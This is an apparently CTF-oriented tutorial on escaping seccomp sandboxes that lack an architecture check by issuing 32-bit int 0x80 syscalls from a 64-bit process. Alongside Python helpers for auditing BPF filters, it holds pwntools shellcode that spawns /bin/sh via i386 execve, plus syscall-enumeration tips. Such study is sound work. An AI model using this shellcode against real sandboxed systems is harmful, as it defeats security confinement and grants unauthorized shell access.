Advanced seccomp Bypass: 32-Bit int 0x80 Syscall Table Exploitation Outside 64-Bit Filter Coverage
Theory
Why This Matters
Advanced seccomp bypasses exploit mismatches between the filter's assumptions and the kernel's actual syscall dispatch mechanism. The most reliable technique is the 32-bit syscall entry (int 0x80) in a 64-bit process: if the BPF filter compares against 64-bit syscall numbers but never checks the architecture, a 32-bit execve (syscall number 11 on i386, not 59 as on x86_64) is evaluated as if it were x86_64 syscall 11 (munmap) and passes whenever that number is not denied. This bypass has been demonstrated in multiple CTF competitions and real hardening audits. NICE S0131 (develop exploits) and T0286 (develop cyber tools) require familiarity with the kernel's dual syscall path and how to craft shellcode that exploits mode gaps.
Core Concept
Two syscall entry points on x86_64 Linux:
1. syscall instruction: invokes the 64-bit syscall table (sys_call_table). Syscall numbers from <asm/unistd_64.h>.
2. int 0x80 instruction: invokes the 32-bit IA32 compatibility syscall table (ia32_sys_call_table). Syscall numbers from <asm/unistd_32.h>.
A seccomp BPF filter written for a 64-bit process typically checks the syscall number loaded from offsetof(struct seccomp_data, nr) — which is the 64-bit syscall number when the syscall instruction is used, or the 32-bit syscall number when int 0x80 is used. However, the architecture field (offsetof(struct seccomp_data, arch)) differs:
- syscall on x86_64: arch = AUDIT_ARCH_X86_64 = 0xC000003E
- int 0x80 on x86_64 process: arch = AUDIT_ARCH_I386 = 0x40000003
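The two arch values are not arbitrary: each is an ELF machine number combined with audit flag bits. A minimal sketch of that arithmetic, using the constant values from <linux/audit.h> and <linux/elf-em.h> (the Python names drop the kernel's leading underscores):

```python
# ELF machine numbers (linux/elf-em.h)
EM_386 = 3
EM_X86_64 = 62

# Flag bits OR-ed into the machine number (linux/audit.h)
AUDIT_ARCH_64BIT = 0x80000000  # __AUDIT_ARCH_64BIT in the kernel header
AUDIT_ARCH_LE = 0x40000000     # __AUDIT_ARCH_LE in the kernel header

AUDIT_ARCH_I386 = EM_386 | AUDIT_ARCH_LE
AUDIT_ARCH_X86_64 = EM_X86_64 | AUDIT_ARCH_64BIT | AUDIT_ARCH_LE

print(hex(AUDIT_ARCH_I386), hex(AUDIT_ARCH_X86_64))
```

Recognizing the 0x3E and 0x03 low bytes makes the arch comparison easy to spot in a raw filter dump.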
A well-written filter blocks the I386 architecture immediately:
A = arch
if (A != ARCH_X86_64) KILL # blocks int 0x80 path
A poorly written filter only checks the syscall number without checking the architecture — in that case, int 0x80 with a 32-bit syscall number that maps to an allowed 64-bit syscall number passes through.
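To see which 32-bit calls an arch-blind policy lets through, the numbers it permits can be looked up in the i386 table. The sketch below uses small, deliberately partial tables copied from the two unistd headers; the helper name int80_reachable is hypothetical, and the policy is modeled as a plain Python predicate instead of real BPF.

```python
# Partial tables only; extend from <asm/unistd_64.h> and <asm/unistd_32.h>.
X86_64 = {0: "read", 1: "write", 2: "open", 3: "close", 4: "stat",
          5: "fstat", 11: "munmap", 59: "execve", 60: "exit"}
I386 = {0: "restart_syscall", 1: "exit", 2: "fork", 3: "read", 4: "write",
        5: "open", 6: "close", 11: "execve", 59: "oldolduname", 60: "umask"}

def int80_reachable(allows):
    """Names of i386 syscalls whose number an arch-blind policy lets through.

    `allows` is a predicate nr -> bool standing in for the filter's decision.
    """
    return sorted(name for nr, name in I386.items() if allows(nr))

# Allowlist meant to permit only close, stat, fstat, exit on x86_64:
allowlist = {3, 4, 5, 60}
print(int80_reachable(lambda nr: nr in allowlist))

# Denylist meant to block only execve (59) on x86_64:
denylist = {59}
print("execve" in int80_reachable(lambda nr: nr not in denylist))
```

With the allowlist above, int 0x80 reaches the i386 open, read, and write calls even though none of them was intended to be allowed; with the denylist, i386 execve (11) is never compared against 59.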
SECCOMP_RET_ERRNO vs SECCOMP_RET_KILL:
- SECCOMP_RET_ERRNO | errnum: the syscall returns -errnum to the process. The process continues running. An attacker who handles the error can attempt alternative paths.
- SECCOMP_RET_KILL_THREAD: the offending thread is killed immediately. Unrecoverable.
- SECCOMP_RET_KILL_PROCESS (since Linux 4.14): the entire process (every thread in the thread group) is killed.
In ERRNO mode, an attacker can use the error return to enumerate which syscalls are allowed: try each one, if it returns EPERM (or the configured errno) it is blocked; if it returns any other error (including ENOSYS for nonexistent syscalls) or succeeds, it is allowed.
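Once a probe has collected raw return values, sorting them is mechanical. A minimal sketch, assuming the probe reports each result as a raw kernel return value (negative errno on failure) and that the filter's configured errno is known. The function name classify is hypothetical.

```python
import errno

def classify(results, filter_errno=errno.EPERM):
    """Split {syscall_nr: raw_return_value} into (blocked, allowed) lists.

    A return equal to -filter_errno is treated as "blocked by the filter";
    anything else, including -ENOSYS, is treated as "allowed".
    """
    blocked, allowed = [], []
    for nr, ret in sorted(results.items()):
        (blocked if ret == -filter_errno else allowed).append(nr)
    return blocked, allowed

probe = {0: 0, 1: -errno.EBADF, 2: -errno.EPERM,
         59: -errno.EPERM, 500: -errno.ENOSYS}
print(classify(probe))
```

A syscall that returns EPERM for its own reasons will show up as a false positive, so choosing arguments that fail with a different error (such as EBADF or EFAULT) keeps the result cleaner.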
Technical Deep-Dive
Detecting the architecture check in seccomp-tools output:
seccomp-tools dump ./challenge
# Look for architecture check at the top:
# 0000: 0x20 0x00 0x00 0x00000004 A = arch
# 0001: 0x15 0x00 0x08 0xc000003e if (A != ARCH_X86_64) goto KILL
# If lines 0000-0001 are MISSING, the filter doesn't check arch -> int 0x80 bypass possible
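The same check can be scripted against the raw filter bytes, for example a dump in raw format if your seccomp-tools version offers one. The sketch below is a heuristic under stated assumptions: it decodes 8-byte little-endian struct sock_filter records and looks for a load of the arch field directly followed by an equality test against AUDIT_ARCH_X86_64. It does not verify where the jump leads. The function names are hypothetical.

```python
import struct

AUDIT_ARCH_X86_64 = 0xC000003E
BPF_LD_W_ABS = 0x20  # BPF_LD | BPF_W | BPF_ABS
BPF_JEQ_K = 0x15     # BPF_JMP | BPF_JEQ | BPF_K
ARCH_OFFSET = 4      # offsetof(struct seccomp_data, arch)

def decode(raw):
    """Return (code, jt, jf, k) tuples, one per struct sock_filter."""
    usable = len(raw) - len(raw) % 8
    return [struct.unpack_from("<HBBI", raw, off) for off in range(0, usable, 8)]

def has_arch_check(raw):
    """True if 'A = arch' is immediately followed by a JEQ on ARCH_X86_64."""
    insns = decode(raw)
    for (code, _, _, k), (ncode, _, _, nk) in zip(insns, insns[1:]):
        if (code == BPF_LD_W_ABS and k == ARCH_OFFSET
                and ncode == BPF_JEQ_K and nk == AUDIT_ARCH_X86_64):
            return True
    return False

# Hand-built filter mirroring lines 0000-0001 of the dump shown above.
ins = lambda code, jt, jf, k: struct.pack("<HBBI", code, jt, jf, k)
checked = ins(0x20, 0, 0, 4) + ins(0x15, 0, 8, 0xC000003E)
print(has_arch_check(checked))
```

A False result is a prompt to read the disassembly by hand; filters that test the architecture in another way (for example by comparing against AUDIT_ARCH_I386) are not recognized by this sketch.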
Crafting 32-bit shellcode for int 0x80 bypass in a 64-bit process:
from pwn import *
context.arch = 'amd64'  # the process stays in 64-bit mode; only the syscall entry point changes
# 32-bit execve via int 0x80:
# eax=11 (execve on i386), ebx=ptr_to_"/bin/sh", ecx=0, edx=0
# IMPORTANT: int 0x80 selects the i386 syscall table, but the instructions before it
# still execute as 64-bit code, so the shellcode is assembled for amd64, not i386.
# int 0x80 only sees the low 32 bits of each argument, so "/bin/sh" must live below 4 GiB.
# The default 64-bit stack (0x7ff...) does not qualify; a non-PIE .bss or a MAP_32BIT mapping does.
LOW_BUF = 0x404800  # ASSUMPTION: hypothetical writable low address; take a real one from the target
shellcode_32bit_compat = asm(f"""
    mov ebx, {LOW_BUF:#x}         /* ebx = low buffer (the write zero-extends into rbx) */
    mov rax, 0x0068732f6e69622f   /* bytes 2f 62 69 6e 2f 73 68 00 = /bin/sh plus NUL */
    mov qword ptr [rbx], rax      /* store the string at LOW_BUF */
    xor ecx, ecx                  /* argv = NULL */
    xor edx, edx                  /* envp = NULL */
    mov eax, 11                   /* SYS_execve on i386 = 11 */
    int 0x80                      /* 32-bit syscall entry: the filter sees nr=11, arch=AUDIT_ARCH_I386 */
""")
# Combine with a 64-bit ROP chain to reach this shellcode
print(f"shellcode length: {len(shellcode_32bit_compat)}")
print(disasm(shellcode_32bit_compat))
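The low-32-bit restriction noted in the comments above can be checked before committing to an address. A minimal sketch; both helper names and the sample addresses are hypothetical:

```python
def int80_view(ptr):
    """Value the int 0x80 path sees for a 64-bit register argument."""
    return ptr & 0xFFFFFFFF

def survives_int80(ptr):
    """True if the pointer is unchanged after truncation to 32 bits."""
    return int80_view(ptr) == ptr

stack_ptr = 0x7FFD1234ABC0  # typical 64-bit stack address (illustrative)
bss_ptr = 0x404800          # typical non-PIE .bss address (illustrative)

print(hex(int80_view(stack_ptr)), survives_int80(stack_ptr))
print(hex(int80_view(bss_ptr)), survives_int80(bss_ptr))
```

A pointer that does not survive truncation will reference a different, usually unmapped, address once the kernel reads it, so the call typically fails rather than spawning a shell.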
Using strace to enumerate allowed syscalls in ERRNO mode:
# If seccomp uses ERRNO mode, strace shows which calls return EPERM
strace -e trace=all ./challenge 2>&1 | grep EPERM
# Calls not returning EPERM are candidates for the allowed set
# Alternatively, use a syscall fuzzer shellcode that tries each number:
python3 -c "
from pwn import *
context.arch = 'amd64'
# Generate shellcode that tries syscall numbers 0-400 in a loop
# and writes results to a pipe -- advanced, but useful for ERRNO-mode enumeration
"
Reverse Engineering Methodology
- Run seccomp-tools dump and check whether the BPF filter's first instructions load and check arch. If no architecture check is present, the int 0x80 bypass is immediately viable.
- Count the number of allowed syscalls. Very restrictive filters (only read/write/exit) require creative alternatives; permissive filters (20+ allowed) have more bypass surface.
- For ERRNO-mode filters: write a short shellcode loop that tries each syscall number (0 to 400) with safe arguments (all zeros), records whether the return is EPERM or something else, and writes results to stdout. The non-EPERM set is the allowed list.
- Check the kernel version and configuration: the kernel reports seccomp_data.arch for every filtered syscall, so the bypass depends on the filter ignoring that field, not on a kernel bug. The int 0x80 path also requires IA32 emulation (CONFIG_IA32_EMULATION) to be enabled. Kernels older than 3.5 predate seccomp BPF filter mode entirely.
Common Reversing Errors
- Assuming 64-bit shellcode works with int 0x80: int 0x80 uses the 32-bit syscall table and only reads the low 32 bits of register arguments. A 64-bit pointer to /bin/sh with high bits set will be truncated. Ensure the target string is in low memory (below 4 GiB). The default 64-bit stack is not, so pushing the string and passing esp typically fails with EFAULT.
- Missing that SECCOMP_RET_TRACE requires a tracer: if the filter returns TRACE for some syscalls, those require a ptrace tracer to handle them. Without a tracer, the tracee receives ENOSYS. This is not directly exploitable but confirms the filter uses a multi-mode approach.
- Confusing syscall numbers between architectures: execve is 59 on x86_64 but 11 on i386. open is 2 on x86_64 but 5 on i386. Always reference the correct unistd header for the calling convention being used.
- Filter installed after fork: some challenges fork a child and install seccomp only in the child. The parent process is unrestricted. If ptrace is available, the parent can influence the child via PTRACE_POKETEXT. Check whether seccomp is per-thread or per-process.